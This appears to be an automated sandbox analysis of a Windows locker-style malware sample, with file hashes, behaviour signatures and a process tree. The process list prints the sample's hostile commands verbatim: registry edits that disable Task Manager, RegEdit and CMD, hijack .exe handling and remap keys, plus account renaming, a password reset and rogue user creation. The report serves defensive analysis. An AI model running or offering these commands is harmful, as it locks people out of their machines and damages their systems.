SHA1 4c4752399ee2678f6cf4d67affca9dcba59d0023
SHA256 ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f
SHA512 adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

MD5 9ef9685c5a578bfdceccaedb0d5fa519
SHA1 713f8621414772eee6602f9fa9ee0a3528d62057
SHA256 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746
SHA512 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

MD5 f346c440007285aff13e1e0512608862
SHA1 4b4a44bc30d37c66dea948bd406effc2bcc63775
SHA256 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901
SHA512 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

MD5 1db691b8c60c5f82f3dae2df999c1c7c
SHA1 c252d4a6e065ab5b122f0ae43f6abdbaad49d80e
SHA256 f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d
SHA512 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7

C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

MD5 908587d867cd053293e2106d70cf42f3
SHA1 83ffc3fc7f61d972b41347ff783a29b41bf13087
SHA256 f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444
SHA512 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8

C:\ProgramData\Microsoft\User Account Pictures\user.bmp

MD5 40e2162dfc51fded60ea7b1de3acf588
SHA1 3c0b932a845027db10e67c47c0c9cd45fa80ecbb
SHA256 d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7
SHA512 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

MD5 e3a317c88b65b975be8e1c21e149f16d
SHA1 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019
SHA256 b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0
SHA512 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:33

Reported

2024-10-18 02:33

Platform

win10v2004-20241007-en

Max time kernel

5s

Max time network

8s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_240623921 C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe C:\Windows\system32\cmd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command C:\Windows\system32\cmd.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 1200 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe C:\Windows\System32\WScript.exe
PID 4752 wrote to memory of 1492 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4752 wrote to memory of 1492 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1492 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1492 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 3300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1492 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1492 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1492 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1616 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1616 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3084 wrote to memory of 4284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3084 wrote to memory of 4284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3280 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3280 wrote to memory of 1504 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3456 wrote to memory of 3992 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3456 wrote to memory of 3992 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2532 wrote to memory of 3760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2532 wrote to memory of 3760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3432 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3432 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 3464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3464 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3464 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1492 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1492 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 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 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\WMIC.exe

wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"

C:\Windows\system32\net.exe

net user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net.exe

net user T3yZrQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T3yZrQ Maxcheto /add

C:\Windows\system32\net.exe

net user 8rJpX1 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add

C:\Windows\system32\net.exe

net user 9MaL2Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add

C:\Windows\system32\net.exe

